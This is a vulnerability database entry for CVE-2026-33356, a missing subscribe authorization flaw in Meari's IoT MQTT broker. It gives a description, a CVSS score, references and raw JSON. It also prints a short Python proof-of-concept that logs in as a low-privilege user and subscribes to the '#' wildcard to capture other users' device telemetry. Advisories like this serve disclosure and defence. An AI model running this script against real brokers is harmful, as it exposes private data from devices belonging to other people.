CVE-2026-33356

Description

In Meari IoT Cloud MQTT Broker deployments running EMQX 4.x, any authenticated low-privilege account can subscribe to global wildcard topics and receive telemetry from devices the user does not own. The broker enforces publish restrictions but does not enforce equivalent subscribe authorization at per-device scope.

CVSS Details

CVSS Score

7.7

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Meari IoT Cloud MQTT Broker (EMQX 4.x)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import paho.mqtt.client as mqtt

# Configuration
BROKER_ADDRESS = "mqtt.meari.example.com"
PORT = 1883
USERNAME = "low_priv_user"
PASSWORD = "password123"

# Callback when message is received
def on_message(client, userdata, message):
    print(f"Topic: {message.topic}\nMessage: {message.payload.decode()}")

# Initialize client
client = mqtt.Client("AttackerClient")
client.username_pw_set(USERNAME, PASSWORD)
client.on_message = on_message

# Connect to broker
print("Connecting to broker...")
client.connect(BROKER_ADDRESS, PORT)

# Start loop
client.loop_start()

# Subscribe to global wildcard to capture all telemetry
# This exploits the missing subscribe authorization
print("Subscribing to wildcard topic '#'")
client.subscribe("#", qos=0)

try:
    while True:
        pass
except KeyboardInterrupt:
    client.loop_stop()
    client.disconnect()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-33356
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-33356
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-33356/
[4] VulDB https://vuldb.com/cve/CVE-2026-33356
[5] https://github.com/xn0tsa/nobody-puts-baby-in-a-corner
[6] https://www.runzero.com/advisories/meari-mqtt-broker-missing-per-device-subscribe-acl-cve-2026-33356/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-33356", "sourceIdentifier": "44488dab-36db-4358-99f9-bc116477f914", "published": "2026-05-11T17:16:30.590", "lastModified": "2026-05-11T17:16:30.590", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In Meari IoT Cloud MQTT Broker deployments running EMQX 4.x, any authenticated low-privilege account can subscribe to global wildcard topics and receive telemetry from devices the user does not own. The broker enforces publish restrictions but does not enforce equivalent subscribe authorization at per-device scope."}], "metrics": {"cvssMetricV31": [{"source": "44488dab-36db-4358-99f9-bc116477f914", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "44488dab-36db-4358-99f9-bc116477f914", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/xn0tsa/nobody-puts-baby-in-a-corner", "source": "44488dab-36db-4358-99f9-bc116477f914"}, {"url": "https://www.runzero.com/advisories/meari-mqtt-broker-missing-per-device-subscribe-acl-cve-2026-33356/", "source": "44488dab-36db-4358-99f9-bc116477f914"}]}}